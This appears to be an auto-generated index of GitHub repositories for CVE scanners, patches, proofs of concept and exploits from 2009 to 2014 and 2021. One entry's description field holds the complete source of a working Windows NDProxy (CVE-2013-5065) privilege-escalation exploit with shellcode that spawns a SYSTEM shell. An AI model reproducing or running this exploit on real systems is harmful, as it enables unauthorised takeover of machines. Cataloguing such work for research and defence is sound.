**Chrome extension that automatically checks visited sites for vulnerability to OpenSSL CVE-2014-0160** : [roganartu/heartbleedchecker-chrome](https://github.com/roganartu/heartbleedchecker-chrome) create time: 2014-04-09T00:41:04Z

**Nmap NSE script that discovers/exploits Heartbleed/CVE-2014-0160** : [takeshixx/ssl-heartbleed.nse](https://github.com/takeshixx/ssl-heartbleed.nse) create time: 2014-04-08T23:39:17Z

**openssl Heart Bleed Exploit: CVE-2014-0160 Mass Security Auditor** : [fb1h2s/CVE-2014-0160](https://github.com/fb1h2s/CVE-2014-0160) create time: 2014-04-08T22:29:55Z

**OpenSSL TLS heartbeat read overrun (CVE-2014-0160)** : [isgroup-srl/openmagic](https://github.com/isgroup-srl/openmagic) create time: 2014-04-08T20:58:26Z

**Test websites for Heartbleed vulnerability (CVE 2014-0160)** : [iwaffles/heartbleed-test.crx](https://github.com/iwaffles/heartbleed-test.crx) create time: 2014-04-08T20:52:22Z

**Heartbleed (CVE-2014-0160) client exploit** : [Lekensteyn/pacemaker](https://github.com/Lekensteyn/pacemaker) create time: 2014-04-08T16:41:51Z

**no description** : [obayesshelton/CVE-2014-0160-Scanner](https://github.com/obayesshelton/CVE-2014-0160-Scanner) create time: 2014-04-08T14:22:36Z

**Multi-threaded tool for scanning many hosts for CVE-2014-0160.** : [musalbas/heartbleed-masstest](https://github.com/musalbas/heartbleed-masstest) create time: 2014-04-08T10:10:43Z

**Patch openssl #heartbleed with ansible** : [jdauphant/patch-openssl-CVE-2014-0160](https://github.com/jdauphant/patch-openssl-CVE-2014-0160) create time: 2014-04-08T09:19:49Z

**Mass, multithreaded testing for servers against Heartbleed (CVE-2014-0160).** : [cyphar/heartthreader](https://github.com/cyphar/heartthreader) create time: 2014-04-08T09:08:52Z

**bleed is a tool to test servers for the 'Heartbleed' vulnerability (CVE-2014-0160).** : [DominikTo/bleed](https://github.com/DominikTo/bleed) create time: 2014-04-08T09:03:01Z

**OpenSSL CVE-2014-0160 Heartbleed vulnerability test** : [titanous/heartbleeder](https://github.com/titanous/heartbleeder) create time: 2014-04-08T04:25:23Z

**Xen 4.2.x and 4.3.x, when using Intel VT-d for PCI passthrough, does not properly flush the TLB after clearing a present translation table entry, which allows local guest administrators to cause a denial of service or gain privileges via unspecified vectors related to an "inverted boolean parameter."** : [bl4ck5un/cve-2013-6375](https://github.com/bl4ck5un/cve-2013-6375) create time: 2014-04-08T02:59:22Z

**A checker (site and tool) for CVE-2014-0160** : [FiloSottile/Heartbleed](https://github.com/FiloSottile/Heartbleed) create time: 2014-04-07T23:03:09Z

**Buffer overflow in the Python bindings for the xc_vcpu_setaffinity call in Xen** : [bl4ck5un/cve-2013-2072](https://github.com/bl4ck5un/cve-2013-2072) create time: 2014-04-07T13:14:04Z

**DOS (infinite loop) attack via a small value in the IHL field of a packet with IPIP encapsulation** : [bl4ck5un/cve-2013-4348](https://github.com/bl4ck5un/cve-2013-4348) create time: 2014-04-07T13:08:34Z

**Attempts to exploit CVE-2012-3137 on vulnerable Oracle servers** : [hantwister/o5logon-fetch](https://github.com/hantwister/o5logon-fetch) create time: 2014-03-29T14:10:36Z

**CVE-2014-0816** : [tandasat/CVE-2014-0816](https://github.com/tandasat/CVE-2014-0816) create time: 2014-02-27T03:07:52Z

**Apple OS X/iOS SSL flaw demonstration** : [gabrielg/CVE-2014-1266-poc](https://github.com/gabrielg/CVE-2014-1266-poc) create time: 2014-02-24T07:48:45Z

**Patch iOS SSL vulnerability (CVE-2014-1266)** : [linusyang/SSLPatch](https://github.com/linusyang/SSLPatch) create time: 2014-02-23T18:37:24Z

**Demonstrating that SSLVerifySignedServerKeyExchange() is trivially testable.** : [landonf/Testability-CVE-2014-1266](https://github.com/landonf/Testability-CVE-2014-1266) create time: 2014-02-22T17:39:21Z

**Android Data Stealing Vulnerability** : [thomascannon/android-cve-2010-4804](https://github.com/thomascannon/android-cve-2010-4804) create time: 2014-02-06T18:53:31Z

**Linux local root exploit for CVE-2014-0038** : [saelo/cve-2014-0038](https://github.com/saelo/cve-2014-0038) create time: 2014-02-02T12:34:57Z

**Automated exploit for CVE-2012-3153 / CVE-2012-3152** : [Mekanismen/pwnacle-fusion](https://github.com/Mekanismen/pwnacle-fusion) create time: 2014-01-28T19:39:50Z

**Using CVE-2013-6282 to bypass Samsung kernel module authentication** : [jeboo/bypasslkm](https://github.com/jeboo/bypasslkm) create time: 2013-12-21T01:51:42Z

**# NDPROXY Local SYSTEM privilege escalation # http://www.offensive-security.com # Tested on Windows XP SP3 # http://www.offensive-security.com/vulndev/ndproxy-local-system-exploit-cve-2013-5065/     # Original crash ... null pointer dereference # Access violation - code c0000005 (!!! second chance !!!) # 00000038 ??              ???   from ctypes import * from ctypes.wintypes import * import os, sys   kernel32 = windll.kernel32 ntdll = windll.ntdll   GENERIC_READ     = 0x80000000 GENERIC_WRITE    = 0x40000000 FILE_SHARE_READ  = 0x00000001 FILE_SHARE_WRITE = 0x00000002 NULL = 0x0 OPEN_EXISTING = 0x3 PROCESS_VM_WRITE            = 0x0020 PROCESS_VM_READ             = 0x0010 MEM_COMMIT                  = 0x00001000 MEM_RESERVE                 = 0x00002000 MEM_FREE                    = 0x00010000 PAGE_EXECUTE_READWRITE      = 0x00000040 PROCESS_ALL_ACCESS          = 2097151 FORMAT_MESSAGE_FROM_SYSTEM  = 0x00001000 baseadd = c_int(0x00000001) MEMRES = (0x1000 | 0x2000) MEM_DECOMMIT = 0x4000 PAGEEXE = 0x00000040 null_size = c_int(0x1000) STATUS_SUCCESS = 0   def log(msg):     print msg   def getLastError():     """[-] Format GetLastError"""     buf = create_string_buffer(2048)     if kernel32.FormatMessageA(FORMAT_MESSAGE_FROM_SYSTEM, NULL,             kernel32.GetLastError(), 0,             buf, sizeof(buf), NULL):         log(buf.value)     else:         log("[-] Unknown Error")   print "[*] Microsoft Windows NDProxy CVE-2013-5065 0day" print "[*] Vulnerability found in the wild" print "[*] Coded by Offensive Security"                 tmp = ("\x00"*4)*5 + "\x25\x01\x03\x07" + "\x00"*4 + "\x34\x00\x00\x00" + "\x00"*(84-24) InBuf = c_char_p(tmp)   dwStatus = ntdll.NtAllocateVirtualMemory(0xFFFFFFFF, byref(baseadd), 0x0, byref(null_size), MEMRES, PAGEEXE) if dwStatus != STATUS_SUCCESS:     print "[+] Something went wrong while allocating the null paged memory: %s" % dwStatus     getLastError() written = c_ulong() sh = "\x90\x33\xC0\x64\x8B\x80\x24\x01\x00\x00\x8B\x40\x44\x8B\xC8\x8B\x80\x88\x00\x00\x00\x2D\x88\x00\x00\x00\x83\xB8\x84\x00\x00\x00\x04\x75\xEC\x8B\x90\xC8\x00\x00\x00\x89\x91\xC8\x00\x00\x00\xC3" sc = "\x90"*0x38 + "\x3c\x00\x00\x00" + "\x90"*4 + sh + "\xcc"*(0x400-0x3c-4-len(sh)) alloc = kernel32.WriteProcessMemory(0xFFFFFFFF, 0x00000001, sc, 0x400, byref(written)) if alloc == 0:     print "[+] Something went wrong while writing our junk to the null paged memory: %s" % alloc     getLastError()   dwRetBytes = DWORD(0) DEVICE_NAME   = "\\\\.\\NDProxy" hdev = kernel32.CreateFileA(DEVICE_NAME, 0, 0, None, OPEN_EXISTING , 0, None) if hdev == -1:     print "[-] Couldn't open the device... :("     sys.exit() kernel32.DeviceIoControl(hdev, 0x8fff23cc, InBuf, 0x54, InBuf, 0x24, byref(dwRetBytes), 0) kernel32.CloseHandle(hdev) print "[+] Spawning SYSTEM Shell..." os.system("start /d \"C:\\windows\\system32\" cmd.exe")** : [Friarfukd/RobbinHood](https://github.com/Friarfukd/RobbinHood) create time: 2013-12-07T05:37:28Z

**CVE-2013-6282 exploit** : [fi01/libget_user_exploit](https://github.com/fi01/libget_user_exploit) create time: 2013-11-28T08:34:35Z

**CVE-2013-6282 exploit** : [fi01/libput_user_exploit](https://github.com/fi01/libput_user_exploit) create time: 2013-11-18T03:08:41Z

**no description** : [guhe120/CVE-2013-5842](https://github.com/guhe120/CVE-2013-5842) create time: 2013-11-12T08:23:44Z

**Grails sample application using the Javamelody 1.44 plugin to illustrate the CVE-2013-4378 vulnerability.** : [theratpack/grails-javamelody-sample-app](https://github.com/theratpack/grails-javamelody-sample-app) create time: 2013-10-16T06:48:28Z

**no description** : [travelworld/cve_2013_3893_trigger.html](https://github.com/travelworld/cve_2013_3893_trigger.html) create time: 2013-10-15T14:56:21Z

**JIT spray version of cve-2013-1491** : [guhe120/CVE20131491-JIT](https://github.com/guhe120/CVE20131491-JIT) create time: 2013-10-03T07:10:37Z

**CVE-2013-2595 exploit** : [fi01/libmsm_cameraconfig_exploit](https://github.com/fi01/libmsm_cameraconfig_exploit) create time: 2013-10-03T04:38:27Z

**Shell script for testing the IPMI cipher type zero authentication bypass vulnerability (CVE-2013-4784)** : [alexoslabs/ipmitest](https://github.com/alexoslabs/ipmitest) create time: 2013-09-27T13:04:24Z

**Debian OpenSSL Predictable PRNG (CVE-2008-0166)** : [g0tmi1k/debian-ssh](https://github.com/g0tmi1k/debian-ssh) create time: 2013-09-22T21:20:31Z

**use the Apple CoreText exploit (CVE-2012-3716) and launch an AP to affect all devices within wifi range** : [d4rkcat/killosx](https://github.com/d4rkcat/killosx) create time: 2013-09-09T21:50:30Z

**no description** : [Meatballs1/cve-2013-1300](https://github.com/Meatballs1/cve-2013-1300) create time: 2013-09-09T14:20:57Z

**Do you own security hotfix with Deviare hooking** : [nektra/CVE-2010-3971-hotpatch](https://github.com/nektra/CVE-2010-3971-hotpatch) create time: 2013-08-07T15:49:14Z

**Exploit PoC for Spring RCE issue (CVE-2011-2894)** : [pwntester/SpringBreaker](https://github.com/pwntester/SpringBreaker) create time: 2013-07-31T08:48:19Z

**:unlock: CVE-2013-4175 -- Local denial of service demo (C)** : [hartwork/mysecureshell-issues](https://github.com/hartwork/mysecureshell-issues) create time: 2013-07-20T21:59:32Z

**CVE-2013-2596 exploit for android** : [hiikezoe/libfb_mem_exploit](https://github.com/hiikezoe/libfb_mem_exploit) create time: 2013-07-16T11:24:09Z

**metasploit module for CVE-2013-3319 / SAP Security Note 1816536** : [integrity-sa/cve-2013-3319](https://github.com/integrity-sa/cve-2013-3319) create time: 2013-07-10T13:47:26Z

**exploit for CVE-2012-4220 working on zte-open** : [poliva/root-zte-open](https://github.com/poliva/root-zte-open) create time: 2013-07-05T12:05:33Z

**no description** : [tarunyadav/fix-cve-2013-2094](https://github.com/tarunyadav/fix-cve-2013-2094) create time: 2013-06-18T04:43:07Z

**CVE-2011-1485 - Published: 2011-04-01 - PolicyKit:** : [Pashkela/CVE-2011-1485](https://github.com/Pashkela/CVE-2011-1485) create time: 2013-06-16T12:11:36Z

**CVE-2013-2094 Linux 2.6.32/2.6.37 - 3.8.10 PERF_EVENTS local root x86/x86_64** : [Pashkela/CVE-2013-2094](https://github.com/Pashkela/CVE-2013-2094) create time: 2013-06-16T11:53:36Z

**CVE-2013-2597 exploit** : [fi01/libmsm_acdb_exploit](https://github.com/fi01/libmsm_acdb_exploit) create time: 2013-06-11T05:07:05Z

**CVE-2013-2094 exploit for android** : [hiikezoe/libperf_event_exploit](https://github.com/hiikezoe/libperf_event_exploit) create time: 2013-06-05T10:59:16Z

**Novell ZENworks Mobile Management - LFI RCE** : [steponequit/CVE-2013-1081](https://github.com/steponequit/CVE-2013-1081) create time: 2013-05-31T08:53:13Z

**For the analysis of CVE-2013-2028** : [danghvu/nginx-1.4.0](https://github.com/danghvu/nginx-1.4.0) create time: 2013-05-21T15:20:05Z

**original cve-2013-2094 exploit and a rewritten version for educational purposes** : [realtalk/cve-2013-2094](https://github.com/realtalk/cve-2013-2094) create time: 2013-05-20T04:23:13Z

**no description** : [feliam/CVE-2013-2730](https://github.com/feliam/CVE-2013-2730) create time: 2013-05-15T21:15:12Z

**no description** : [feliam/CVE-2013-2729](https://github.com/feliam/CVE-2013-2729) create time: 2013-05-15T04:12:13Z

**This is used to scan for CVE-2012-2122 vulnerable servers.** : [Avinza/CVE-2012-2122-scanner](https://github.com/Avinza/CVE-2012-2122-scanner) create time: 2013-05-09T17:11:20Z

**Discover uPNP devices vulnerable to CVE-2013-0229 / CVE-2013-0230 / CVE-2012-5958 / CVE-2012-5959** : [lochiiconnectivity/vulnupnp](https://github.com/lochiiconnectivity/vulnupnp) create time: 2013-04-14T23:34:56Z

**Inspect all of your Heroku apps for vulnerable versions of the JSON gem** : [heroku/heroku-CVE-2013-0269](https://github.com/heroku/heroku-CVE-2013-0269) create time: 2013-02-11T18:02:20Z

**MySQL-Fu is a Ruby based MySQL Client Script I wrote. It does most of the stuff a normal MySQL client might do: SQL Shell, Update/Delete/Drop Database/Table, Add/Delete Users, Dump Database(s)/Table w/ option for gzip...... Plus a few extra options to make life a little easier for pentests. Includes Several builtin PHP Command Shell options as well as Pentestmonkey's PHP Reverse Shell, in addition to multiple options for file writing and reading (all files read logged locally for offline analysis later), also includes Ruby port of Kingcope's CVE-2012-5613 Linux MySQL Privilege Escalation Exploit.** : [Hood3dRob1n/MySQL-Fu.rb](https://github.com/Hood3dRob1n/MySQL-Fu.rb) create time: 2013-02-09T04:59:43Z

**no description** : [heroku/heroku-CVE-2013-0333](https://github.com/heroku/heroku-CVE-2013-0333) create time: 2013-01-29T00:33:03Z

**no description** : [mitaku/rails_cve_2013_0156_patch](https://github.com/mitaku/rails_cve_2013_0156_patch) create time: 2013-01-18T03:35:08Z

**Bootstrapped Rails 3.2.10 to test the remote code exploit CVE-2013-0156** : [bsodmike/rails-exploit-cve-2013-0156](https://github.com/bsodmike/rails-exploit-cve-2013-0156) create time: 2013-01-12T13:37:05Z

**crack repo from jnunemaker but with version 0.1.8 and rails CVE-2013-0156 vulnerability fixed** : [josal/crack-0.1.8-fixed](https://github.com/josal/crack-0.1.8-fixed) create time: 2013-01-11T18:21:57Z

**Inspect all of your heroku apps to see if they are running a vulnerable version of Rails** : [heroku/heroku-CVE-2013-0156](https://github.com/heroku/heroku-CVE-2013-0156) create time: 2013-01-11T02:13:48Z

**Silly Rails App to demonstrate vuln CVE-2013-0156** : [terracatta/name_reverser](https://github.com/terracatta/name_reverser) create time: 2013-01-10T20:46:08Z

**Obtain root access through CVE-2012-4220** : [hiikezoe/diaggetroot](https://github.com/hiikezoe/diaggetroot) create time: 2013-01-07T11:45:35Z

**Demo app showing how the Rails CVE-2013-5664 vulnerability works.** : [phusion/rails-cve-2012-5664-test](https://github.com/phusion/rails-cve-2012-5664-test) create time: 2013-01-03T10:07:27Z

**Mempodipper, a linux local root exploit.** : [srclib/CVE-2012-0056](https://github.com/srclib/CVE-2012-0056) create time: 2012-12-29T15:02:02Z

**Example of exploiting CVE-2011-3026 on Firefox (Linux/x86)** : [argp/cve-2011-3026-firefox](https://github.com/argp/cve-2011-3026-firefox) create time: 2012-08-02T16:12:06Z

**Demo of Apache httpOnly Cookie Disclosure Exploit CVE2012 0053** : [jonathansp/CVE20120053Demo](https://github.com/jonathansp/CVE20120053Demo) create time: 2012-06-22T21:13:44Z

**Python Apache Killer (Range Header DoS CVE-2011-3192)** : [tkisason/KillApachePy](https://github.com/tkisason/KillApachePy) create time: 2011-10-26T21:07:59Z

**Puppet Module to help fix and migrate a Puppet deployment (CVE-2011-3872)** : [puppetlabs/puppetlabs-cve20113872](https://github.com/puppetlabs/puppetlabs-cve20113872) create time: 2011-10-17T01:26:34Z

**CVE-2011-0228 fix for older idevices/firmwares** : [jan0/isslfix](https://github.com/jan0/isslfix) create time: 2011-07-31T18:29:08Z

**Workaround for the vulnerability identified by TWSL2011-007 or CVE-2008-0228 - iOS x509 Certificate Chain Validation Vulnerability** : [SpiderLabs/TWSL2011-007_iOS_code_workaround](https://github.com/SpiderLabs/TWSL2011-007_iOS_code_workaround) create time: 2011-07-28T22:20:41Z

**http://www.oracle.com/technetwork/topics/security/alert-cve-2010-4476-305811.html** : [grzegorzblaszczyk/CVE-2010-4476-check](https://github.com/grzegorzblaszczyk/CVE-2010-4476-check) create time: 2011-02-10T10:05:56Z

**sample exploit of buffer overflow in libpng** : [mk219533/CVE-2010-1205](https://github.com/mk219533/CVE-2010-1205) create time: 2010-09-14T22:16:11Z

**Provides a quick workaround for the segfault bug in Ruby (CVE-2009-1904)** : [NZKoz/bigdecimal-segfault-fix](https://github.com/NZKoz/bigdecimal-segfault-fix) create time: 2009-06-08T23:21:40Z

**CVE-2020-2021** : [mr-r3b00t/CVE-2020-2021](https://api.github.com/repos/mr-r3b00t/CVE-2020-2021) create time: 2020-06-29T16:56:10Z

**lanproxy 目录遍历漏洞批量检测 (CVE-2021-3019)** : [B1anda0/CVE-2021-3019](https://api.github.com/repos/B1anda0/CVE-2021-3019) create time: 2021-01-09T07:11:38Z

**PoC for CVE-2021-1056, related to GPU Container Security** : [pokerfaceSad/CVE-2021-1056](https://api.github.com/repos/pokerfaceSad/CVE-2021-1056) create time: 2021-01-08T11:29:48Z

**CVE-2021-3131** : [jet-pentest/CVE-2021-3131](https://api.github.com/repos/jet-pentest/CVE-2021-3131) create time: 2021-01-13T07:41:25Z

**Free Best Exploit** : [exploiterkid33/Exploit-Builder-2021-Cve2019](https://api.github.com/repos/exploiterkid33/Exploit-Builder-2021-Cve2019) create time: 2021-01-14T01:51:07Z

**lanproxy 目录遍历漏洞批量检测用户名密码POC (CVE-2021-3019)** : [liuxu54898/CVE-2021-3019](https://api.github.com/repos/liuxu54898/CVE-2021-3019) create time: 2021-01-14T07:19:21Z

**Church Rota version 2.6.4 is vulnerable to authenticated remote code execution. The user does not need to have file upload permission in order to upload and execute an arbitrary file. The application is written primarily with PHP so we use PHP in our PoC ** : [rmccarth/cve-2021-3164](https://api.github.com/repos/rmccarth/cve-2021-3164) create time: 2021-01-20T02:48:46Z

**None** : [dmlgzs/cve-2021-1647](https://api.github.com/repos/dmlgzs/cve-2021-1647) create time: 2021-01-20T10:05:00Z

**None** : [jet-pentest/CVE-2021-3130](https://api.github.com/repos/jet-pentest/CVE-2021-3130) create time: 2021-01-21T08:04:32Z

**CVE-2021-2109 && Weblogic Server RCE via JNDI** : [Al1ex/CVE-2021-2109](https://api.github.com/repos/Al1ex/CVE-2021-2109) create time: 2021-01-22T05:37:11Z

**None** : [rabbitsafe/CVE-2021-2109](https://api.github.com/repos/rabbitsafe/CVE-2021-2109) create time: 2021-01-22T07:43:46Z

**Laravel debug rce** : [SNCKER/CVE-2021-3129](https://api.github.com/repos/SNCKER/CVE-2021-3129) create time: 2021-01-22T05:12:21Z

**None** : [SecPros-Team/laravel-CVE-2021-3129-EXP](https://api.github.com/repos/SecPros-Team/laravel-CVE-2021-3129-EXP) create time: 2021-01-25T08:42:28Z

**None** : [mr-r3b00t/CVE-2021-3156](https://api.github.com/repos/mr-r3b00t/CVE-2021-3156) create time: 2021-01-26T19:53:04Z

**None** : [crisprss/Laravel_CVE-2021-3129_EXP](https://api.github.com/repos/crisprss/Laravel_CVE-2021-3129_EXP) create time: 2021-01-27T05:44:52Z

**None** : [jokerTPR2004/CVE-2021-3156](https://api.github.com/repos/jokerTPR2004/CVE-2021-3156) create time: 2021-01-27T16:35:43Z

**None** : [nexcess/sudo_cve-2021-3156](https://api.github.com/repos/nexcess/sudo_cve-2021-3156) create time: 2021-01-27T14:40:57Z

**cve-2021-3156;sudo堆溢出漏洞;漏洞检测** : [yaunsky/cve-2021-3156](https://api.github.com/repos/yaunsky/cve-2021-3156) create time: 2021-01-28T02:20:24Z

**脚本小子竟是我自己?** : [H4ckForJob/cve-2021-3156](https://api.github.com/repos/H4ckForJob/cve-2021-3156) create time: 2021-01-28T02:29:37Z

**This simple bash script will patch the recently discovered sudo heap overflow vulnerability.** : [elbee-cyber/CVE-2021-3156-PATCHER](https://api.github.com/repos/elbee-cyber/CVE-2021-3156-PATCHER) create time: 2021-01-27T21:49:06Z

**sudo安全漏洞检测脚本,用来检查您的系统当前是否存在相关的安全漏洞。** : [gh-Devin/sudo-cve-2021](https://api.github.com/repos/gh-Devin/sudo-cve-2021) create time: 2021-01-28T06:22:38Z

**None** : [baka9moe/CVE-2021-3156-Exp](https://api.github.com/repos/baka9moe/CVE-2021-3156-Exp) create time: 2021-01-28T08:55:04Z

**CVE-2021-3156** : [ph4ntonn/CVE-2021-3156](https://api.github.com/repos/ph4ntonn/CVE-2021-3156) create time: 2021-01-28T09:52:55Z

**1day research effort** : [kernelzeroday/CVE-2021-3156-Baron-Samedit](https://api.github.com/repos/kernelzeroday/CVE-2021-3156-Baron-Samedit) create time: 2021-01-28T02:13:49Z

**None** : [binw2018/CVE-2021-3156-SCRIPT](https://api.github.com/repos/binw2018/CVE-2021-3156-SCRIPT) create time: 2021-01-29T03:34:31Z

**Exploit for CVE-2021-3129** : [ambionics/laravel-exploits](https://api.github.com/repos/ambionics/laravel-exploits) create time: 2021-01-13T12:52:20Z

**Notes regarding CVE-2021-3156: Heap-Based Buffer Overflow in Sudo** : [mbcrump/CVE-2021-3156](https://api.github.com/repos/mbcrump/CVE-2021-3156) create time: 2021-01-29T19:24:41Z

**None** : [teamtopkarl/CVE-2021-3156](https://api.github.com/repos/teamtopkarl/CVE-2021-3156) create time: 2021-01-31T03:38:37Z

**CVE-2021-3156** : [reverse-ex/CVE-2021-3156](https://api.github.com/repos/reverse-ex/CVE-2021-3156) create time: 2021-01-27T16:03:34Z

**复现别人家的CVEs系列** : [Q4n/CVE-2021-3156](https://api.github.com/repos/Q4n/CVE-2021-3156) create time: 2021-01-31T07:01:50Z

**None** : [ltfafei/CVE-2021-3156](https://api.github.com/repos/ltfafei/CVE-2021-3156) create time: 2021-01-29T11:32:33Z

**CVE-2021-3156** : [ymrsmns/CVE-2021-3156](https://api.github.com/repos/ymrsmns/CVE-2021-3156) create time: 2021-01-27T20:57:00Z

**A docker environment to research CVE-2021-3156** : [apogiatzis/docker-CVE-2021-3156](https://api.github.com/repos/apogiatzis/docker-CVE-2021-3156) create time: 2021-01-31T22:58:13Z

**a simple script to patch CVE-2021-3156 (heap based buffer overflow via sudo).** : [voidlsd/CVE-2021-3156](https://api.github.com/repos/voidlsd/CVE-2021-3156) create time: 2021-02-01T00:41:55Z

**checking CVE-2021-3156 vulnerability & patch script** : [nobodyatall648/CVE-2021-3156](https://api.github.com/repos/nobodyatall648/CVE-2021-3156) create time: 2021-01-30T10:53:26Z

**None** : [kal1gh0st/CVE-2021-3156](https://api.github.com/repos/kal1gh0st/CVE-2021-3156) create time: 2021-01-31T16:10:11Z

**Patch Script for CVE-2021-3156 Heap Overflow** : [Ashish-dawani/CVE-2021-3156-Patch](https://api.github.com/repos/Ashish-dawani/CVE-2021-3156-Patch) create time: 2021-02-01T10:35:03Z

**None** : [SantiagoSerrao/ScannerCVE-2021-3156](https://api.github.com/repos/SantiagoSerrao/ScannerCVE-2021-3156) create time: 2021-02-01T18:46:34Z

**This is a repo for the PoC's I found from diffrernt github repoisitory of the recent sudo CVE 2021-3156 (Baron Samedit)** : [AbdullahRizwan101/Baron-Samedit](https://api.github.com/repos/AbdullahRizwan101/Baron-Samedit) create time: 2021-02-02T12:55:30Z

**None** : [blasty/CVE-2021-3156](https://api.github.com/repos/blasty/CVE-2021-3156) create time: 2021-01-30T20:39:58Z

**None** : [jet-pentest/CVE-2021-3395](https://api.github.com/repos/jet-pentest/CVE-2021-3395) create time: 2021-02-02T18:31:35Z

**Apache Druid 远程代码执行;检测脚本** : [yaunsky/cve-2021-25646](https://api.github.com/repos/yaunsky/cve-2021-25646) create time: 2021-02-03T03:59:52Z

**None** : [lp008/CVE-2021-25646](https://api.github.com/repos/lp008/CVE-2021-25646) create time: 2021-02-03T06:45:54Z

**None** : [cdeletre/Serpentiel-CVE-2021-3156](https://api.github.com/repos/cdeletre/Serpentiel-CVE-2021-3156) create time: 2021-02-03T09:04:14Z

**CVE-2021-3156 Vagrant Lab** : [dinhbaouit/CVE-2021-3156](https://api.github.com/repos/dinhbaouit/CVE-2021-3156) create time: 2021-02-03T09:48:46Z

**Root shell PoC for CVE-2021-3156** : [CptGibbon/CVE-2021-3156](https://api.github.com/repos/CptGibbon/CVE-2021-3156) create time: 2021-02-03T19:57:56Z

**None** : [leterts/CVE-2021-3156-sudo-raising](https://api.github.com/repos/leterts/CVE-2021-3156-sudo-raising) create time: 2021-02-03T11:27:52Z

**CVE-2021-1994、CVE-2021-2047、CVE-2021-2064、CVE-2021-2108、CVE-2021-2075、CVE-2019-17195、CVE-2020-14756、CVE-2021-2109** : [somatrasss/weblogic2021](https://api.github.com/repos/somatrasss/weblogic2021) create time: 2021-02-04T07:03:56Z

**CSharp CVE-2021-25646-GUI** : [AirEvan/CVE-2021-25646-GUI](https://api.github.com/repos/AirEvan/CVE-2021-25646-GUI) create time: 2021-02-04T12:51:01Z

**None** : [y3rb1t4/CVE-2021-3157](https://api.github.com/repos/y3rb1t4/CVE-2021-3157) create time: 2021-02-05T09:07:20Z

**Custom version of sudo 1.8.3p1 with CVE-2021-3156 patches applied** : [perlun/sudo-1.8.3p1-patched](https://api.github.com/repos/perlun/sudo-1.8.3p1-patched) create time: 2021-02-05T09:13:17Z

**None** : [1N53C/CVE-2021-3156-PoC](https://api.github.com/repos/1N53C/CVE-2021-3156-PoC) create time: 2021-02-06T21:16:11Z

**POC exploit of CVE-2021-3345, a vulnerability in libgcrypt version 1.9.0** : [MLGRadish/CVE-2021-3345](https://api.github.com/repos/MLGRadish/CVE-2021-3345) create time: 2021-01-31T09:28:14Z

**None** : [Grayhaxor/CVE-2021-21148](https://api.github.com/repos/Grayhaxor/CVE-2021-21148) create time: 2021-02-07T09:59:47Z

**None** : [fullbbadda1208/CVE-2021-3229](https://api.github.com/repos/fullbbadda1208/CVE-2021-3229) create time: 2021-02-07T14:12:27Z

**None** : [roughb8722/CVE-2021-3122-Details](https://api.github.com/repos/roughb8722/CVE-2021-3122-Details) create time: 2021-02-07T16:05:49Z

**PoC for CVE-2021-3156 (sudo heap overflow)** : [stong/CVE-2021-3156](https://api.github.com/repos/stong/CVE-2021-3156) create time: 2021-01-30T03:22:04Z

**보안취약점 확인** : [gmldbd94/cve-2021-3156](https://api.github.com/repos/gmldbd94/cve-2021-3156) create time: 2021-02-09T07:06:49Z

**sudo heap overflow to LPE, in Go** : [jm33-m0/CVE-2021-3156](https://api.github.com/repos/jm33-m0/CVE-2021-3156) create time: 2021-02-09T07:55:47Z

**CVE-2021-3156非交互式执行命令** : [Rvn0xsy/CVE-2021-3156-plus](https://api.github.com/repos/Rvn0xsy/CVE-2021-3156-plus) create time: 2021-02-09T19:25:18Z

**CVE-2021-3165: SmartAgent 3.1.0 - Privilege Escalation** : [orionhridoy/CVE-2021-3165](https://api.github.com/repos/orionhridoy/CVE-2021-3165) create time: 2021-02-10T08:51:00Z

**None** : [synacktiv/CVE-2021-1782](https://api.github.com/repos/synacktiv/CVE-2021-1782) create time: 2021-02-10T14:38:05Z

**None** : [FunPhishing/CVE-2021-24096](https://api.github.com/repos/FunPhishing/CVE-2021-24096) create time: 2021-02-11T12:32:34Z

**None** : [jet-pentest/CVE-2021-27187](https://api.github.com/repos/jet-pentest/CVE-2021-27187) create time: 2021-02-11T15:03:48Z

**None** : [anmolksachan/CVE-2021-27190-PEEL-Shopping-cart-9.3.0-Stored-XSS](https://api.github.com/repos/anmolksachan/CVE-2021-27190-PEEL-Shopping-cart-9.3.0-Stored-XSS) create time: 2021-02-11T07:10:58Z

**None** : [jet-pentest/CVE-2021-27188](https://api.github.com/repos/jet-pentest/CVE-2021-27188) create time: 2021-02-12T07:32:51Z

**How to solve Sudo Heap-Based Buffer Overflow Vulnerability — CVE-2021-3156?** : [r3k4t/how-to-solve-sudo-heap-based-bufferoverflow-vulnerability](https://api.github.com/repos/r3k4t/how-to-solve-sudo-heap-based-bufferoverflow-vulnerability) create time: 2021-02-12T02:44:30Z

**Magento versions 2.4.1 (and earlier), 2.4.0-p1 (and earlier) and 2.3.6 (and earlier) are vulnerable to a file upload restriction bypass. Successful exploitation could lead to arbitrary code execution by an authenticated attacker.** : [HoangKien1020/CVE-2021-21014](https://api.github.com/repos/HoangKien1020/CVE-2021-21014) create time: 2021-02-13T06:16:39Z

**None** : [Vulnmachines/Apache-Druid-CVE-2021-25646](https://api.github.com/repos/Vulnmachines/Apache-Druid-CVE-2021-25646) create time: 2021-02-13T11:48:35Z

**None** : [FunPhishing/Laravel-8.4.2-rce-CVE-2021-3129](https://api.github.com/repos/FunPhishing/Laravel-8.4.2-rce-CVE-2021-3129) create time: 2021-02-14T09:24:07Z

**RCE in NPM VSCode Extention** : [jackadamson/CVE-2021-26700](https://api.github.com/repos/jackadamson/CVE-2021-26700) create time: 2021-02-14T14:01:04Z

**None** : [sourceincite/CVE-2021-26121](https://api.github.com/repos/sourceincite/CVE-2021-26121) create time: 2021-02-12T18:53:37Z

**None** : [sourceincite/CVE-2021-24085](https://api.github.com/repos/sourceincite/CVE-2021-24085) create time: 2021-02-15T14:41:25Z

**Exploit script for CVE-2021-27211** : [b4shfire/stegcrack](https://api.github.com/repos/b4shfire/stegcrack) create time: 2021-02-15T17:54:49Z

**Investigating the bug behind CVE-2021-26708** : [jordan9001/vsock_poc](https://api.github.com/repos/jordan9001/vsock_poc) create time: 2021-02-15T20:27:06Z

**None** : [klinix5/CVE-2021-1727](https://api.github.com/repos/klinix5/CVE-2021-1727) create time: 2021-02-16T16:55:46Z

**Laravel <= v8.4.2 debug mode: Remote code execution (CVE-2021-3129)** : [zhzyker/CVE-2021-3129](https://api.github.com/repos/zhzyker/CVE-2021-3129) create time: 2021-02-18T05:42:13Z

**XSS-Askey** : [bokanrb/CVE-2021-27403](https://api.github.com/repos/bokanrb/CVE-2021-27403) create time: 2021-02-18T16:14:48Z

